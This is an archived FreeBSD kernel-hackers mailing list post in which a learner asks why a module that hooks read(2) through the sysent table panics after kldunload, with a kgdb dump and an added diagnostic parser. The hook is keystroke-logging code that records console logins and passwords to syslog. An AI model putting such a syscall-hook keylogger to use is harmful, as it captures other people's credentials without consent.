From owner-freebsd-hackers@FreeBSD.ORG Mon Jun 16 12:43:44 2008
Date: Mon, 16 Jun 2008 14:15:16 +0200
From: "Lukasz Jaroszewski"
To: freebsd-hackers@freebsd.org
Subject: KLM - Fatal trap 12 on kldunload mod - sc replace
Hi,

I am trying to master the kernel; my first thought was to do a simple replacement of a system call (read), though I have some issues which I can't figure out. My read_hack is supposed to log keystrokes, and it does, though only the login and password typed from the console, and without the 1st char (typing root appears as oot). Next, after kldunload and changing tty, the system does a ``fatal trap''.

Here is the code I use:

---------------------------cut--------------------------
#include <sys/param.h>
#include <sys/proc.h>
#include <sys/module.h>
#include <sys/sysent.h>
#include <sys/kernel.h>
#include <sys/systm.h>
#include <sys/syscall.h>
#include <sys/sysproto.h>
#include <sys/syslog.h>

/* Original read(2) handler, saved at load time and restored on unload. */
static sy_call_t *oldsy;

/* Replacement for read(2): run the real read, then log the byte when the
 * call was a one-byte read on fd 0 (the console tty). */
static int
read_hack(struct thread *td, void *syscall_args)
{
    struct read_args *uap;
    char buf[1];
    int error;

    uap = (struct read_args *)syscall_args;
    error = read(td, syscall_args);
    if (error || (!uap->nbyte) || (uap->nbyte > 1) || (uap->fd != 0))
        return (error);
    /* One raw byte, not a NUL-terminated string: copyin, not copyinstr. */
    if (copyin(uap->buf, buf, 1) != 0)
        return (error);
    log(LOG_INFO, "mex: %c\n", buf[0]);
    return (error);
}
---------------------------cut---------------------

And in load() I do:

---------------------------cut---------------------
static int
load(struct module *module, int cmd, void *arg)
{
    int error = 0;

    switch (cmd) {
    case MOD_LOAD:
        /* Swap our handler into the system call table. */
        oldsy = sysent[SYS_read].sy_call;
        sysent[SYS_read].sy_call = (sy_call_t *)read_hack;
        break;
    case MOD_UNLOAD:
        /* Put the original handler back. */
        sysent[SYS_read].sy_call = (sy_call_t *)oldsy;
        break;
    default:
        error = EOPNOTSUPP;
        break;
    }
    return (error);
}
---------------------------cut-------------------

After changing to another tty I get:

--------------------------------------------------------------------
# kgdb kernel.debug /var/crash/vmcore.5
[GDB will not be able to debug user-mode threads: /usr/lib/libthread_db.so: Undefined symbol "ps_pglobal_lookup"]
GNU gdb 6.1.1 [FreeBSD]
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-marcel-freebsd".

Unread portion of the kernel message buffer:

Fatal trap 12: page fault while in kernel mode
cpuid = 0; apic id = 00
fault virtual address   = 0xc23f656e
fault code              = supervisor read, page not present
instruction pointer     = 0x20:0xc23f656e
stack pointer           = 0x28:0xcd63bc60
frame pointer           = 0x28:0xcd63bc80
code segment            = base 0x0, limit 0xfffff, type 0x1b
                        = DPL 0, pres 1, def32 1, gran 1
processor eflags        = interrupt enabled, resume, IOPL = 0
current process         = 1139 (csh)
panic: from debugger
cpuid = 0
Uptime: 34m47s
Physical memory: 234 MB
Dumping 37 MB: 22 6

#0  doadump () at pcpu.h:195
195             __asm __volatile("movl %%fs:0,%0" : "=r" (td));
(kgdb) wh

;;------below reformatted text, tr'ed escape chars which made frame around it-------
pcpu.h
177              : "=m" (*(struct __s *) (__pcpu_offset(name)))     \
178              : "r" (__s));                                      \
179          } else {                                               \
180              *__PCPU_PTR(name) = __val;                         \
181          }                                                      \
182      }
183
184      #define PCPU_GET(member)        __PCPU_GET(pc_ ## member)
185      #define PCPU_ADD(member, val)   __PCPU_ADD(pc_ ## member, val)
186      #define PCPU_INC(member)        __PCPU_INC(pc_ ## member)
187      #define PCPU_PTR(member)        __PCPU_PTR(pc_ ## member)
188      #define PCPU_SET(member, val)   __PCPU_SET(pc_ ## member, val)
189
190      static __inline struct thread *
191      __curthread(void)
192      {
193              struct thread *td;
194
195              __asm __volatile("movl %%fs:0,%0" : "=r" (td));
196              return (td);
197      }
198      #define curthread       (__curthread())
199
200      #else /* !lint || defined(__GNUCLIKE_ASM) && defined(__GNUCLIKE___TYPEOF) */
201
202      #error "this file needs to be ported to your compiler"
203
204      #endif /* lint, etc. */
205
206      #endif /* _KERNEL */
207
208      #endif /* !_MACHINE_PCPU_H_ */
209
210
211
212
213
214
;;-----------------------------------end of tr'ed frame---------------------------------
kernel Thread 100076  In: doadump          Line: 195  PC: 0xc074f42c
Segmentation fault (core dumped)
#
# uname -a
FreeBSD 7.0-BETA3 FreeBSD 7.0-BETA3 #1: Sat Nov 24 11:19:31 UTC 2007     root@:/usr/obj/usr/src/sys/BSDKITCHEN  i386

I know it's BETA, but I don't think it's an issue; I guess I am doing something wrong. I would like to know, as much as anyone can / has the will / time to explain it to me, where the layer 8 error is. :)

Best regards
LVJ
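An added example, not from the poster or from FreeBSD: a small user-space C program that parses the "Fatal trap 12" lines quoted above and flags the tell-tale case where the fault virtual address equals the instruction pointer. That combination means the CPU faulted while fetching code from an unmapped page, which is the signature of a thread that was still sleeping inside read_hack's call to read() on the tty when kldunload unmapped the module, and then returned into the module's former text (the same race at load time is why the first keystroke is missed). The sample text is constructed from the values on this page.

```c
#include <stdio.h>
#include <string.h>

/* Constructed sample: the trap lines from the poster's kernel message buffer. */
static const char *trap_after_kldunload =
    "Fatal trap 12: page fault while in kernel mode\n"
    "fault virtual address   = 0xc23f656e\n"
    "fault code              = supervisor read, page not present\n"
    "instruction pointer     = 0x20:0xc23f656e\n";

struct trap_info {
    unsigned int fault_va; /* address the CPU could not access */
    unsigned int ip;       /* EIP offset when the fault was taken */
    int not_present;       /* 1 when the fault code says "page not present" */
};
enum { TRAP_UNPARSED = 0, TRAP_DATA_FAULT = 1, TRAP_EXEC_UNMAPPED = 2 };

/* Extract the three fields we need; returns how many were found (3 = complete). */
static int parse_trap(const char *text, struct trap_info *ti)
{
    const char *line = text, *nl;
    unsigned int seg, val;
    char code[128];
    int found = 0;

    memset(ti, 0, sizeof(*ti));
    while (line != NULL && *line != '\0') {
        if (sscanf(line, "fault virtual address = 0x%x", &val) == 1) {
            ti->fault_va = val; found++;
        } else if (sscanf(line, "instruction pointer = 0x%x:0x%x", &seg, &val) == 2) {
            ti->ip = val; found++;
        } else if (sscanf(line, "fault code = %127[^\n]", code) == 1) {
            ti->not_present = strstr(code, "page not present") != NULL; found++;
        }
        nl = strchr(line, '\n');
        line = nl ? nl + 1 : NULL;
    }
    return found;
}

/* Fault address == instruction pointer: the CPU faulted fetching code from an
 * unmapped page. After kldunload of a module that replaced sysent[SYS_read].sy_call,
 * that is what a thread still blocked in the hook's read() call produces on return. */
static int classify_trap(const char *text)
{
    struct trap_info ti;
    if (parse_trap(text, &ti) < 3)
        return TRAP_UNPARSED;
    return (ti.not_present && ti.fault_va == ti.ip) ? TRAP_EXEC_UNMAPPED : TRAP_DATA_FAULT;
}
```

classify_trap(trap_after_kldunload) returns TRAP_EXEC_UNMAPPED; a dump whose instruction pointer differs from the fault address (a bad data pointer dereferenced from mapped code) returns TRAP_DATA_FAULT.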